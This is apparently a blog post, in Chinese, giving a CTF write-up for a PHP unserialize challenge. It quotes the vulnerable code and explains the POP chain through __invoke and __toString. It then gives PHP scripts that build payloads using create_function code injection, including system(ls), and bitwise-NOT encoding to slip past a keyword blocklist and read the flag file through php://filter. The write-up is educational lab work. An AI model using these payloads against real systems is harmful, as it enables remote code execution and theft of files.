Loading

BUUCTF-日刷-[DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser/反序列化-正则过滤

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}

class B{
    public $func;
    public $arg;
    
    public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else { 
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg); 
        }
    }
    
    public function __toString(){
        $this->show();
        return "<br>"."Nice Job!!"."<br>";
    }
    
    
}

if(isset($_GET['pop'])){
    $aaa = unserialize($_GET['pop']);
    $aaa();
}
else{
    highlight_file(__FILE__);
}

?>

思路很明显,要执行B类中的show函数,来包含flag(但是它这个包含也不会输出,这里等会分析)

 

 

 怎么执行是看A类

 

 

 __invoke函数是调用A类时候会触发,调用A类,触发show方法,show方法输出 $var。

而让$var等于B类,B类中的__toString()方法会调用B的show函数

 

 

 至于怎么调用A类,这里传入pop参数,反序列化后,原代码会调用pop反序列化

 

 

 

 

那么下面就是分析如何反序列化到A类的show方法时能够包含

 public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else { 
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg); 
        }
    }

先看正则表达式,前面是$func不能是开头到结尾纯数字字母,i是大小写都匹配,s是匹配任何空白符号(空格,制表),D是结尾不是换行符号

这里很好绕过,比如var_dump含有一个_即可绕过。或者开头换行符号都可以

后面是$arg过滤了一大堆东西,

都满足就会包含flag.php,但没啥用,因为没输出。同时会把$当作函数名,传入两个参数,一个是空字符串,一个是$arg

 

既然包含没用,不如从后面函数执行想办法,首先这个函数是要有两个参数,还能任意命令执行的

这里对着手册很快能找到函数create_function,传入

return(1);}任意代码;//

}会和前面{闭合,后面注释符号会注释后面的{,实现执行任意代码(一开始用/*注释,但是被过滤了)

$a = new A;
$b = new B;
$b->func="create_function";
$b->arg='return(1);}system(ls);//';;
$a->var=$b;
$ser = serialize($a);
echo $ser;

构造如上代码

 

 看到tru3flag.php猜测这个是真flag

但是过滤有很多,单双引号,flag,小数点全过滤了,这里用到取反

但是还有一个问题是取反后的符号大多数不可打印符号,不方便复制get传入,因此要对他进行url编码

$ac=(~('php://filter/read=convert.base64-encode/resource=Tru3flag.php'));
$at='return(1);}require(~('.strval($ac).'));//';
$a = new A;
$b = new B;
$b->func="create_function";;
$b->arg=$at;
$a->var=$b;
$ser = serialize($a);
//echo $ser;
echo urlencode($ser);

这里用伪协议读取php内容

 

 

 

posted @ 2021-09-25 23:38  Aninock  阅读(371)  评论(0编辑  收藏  举报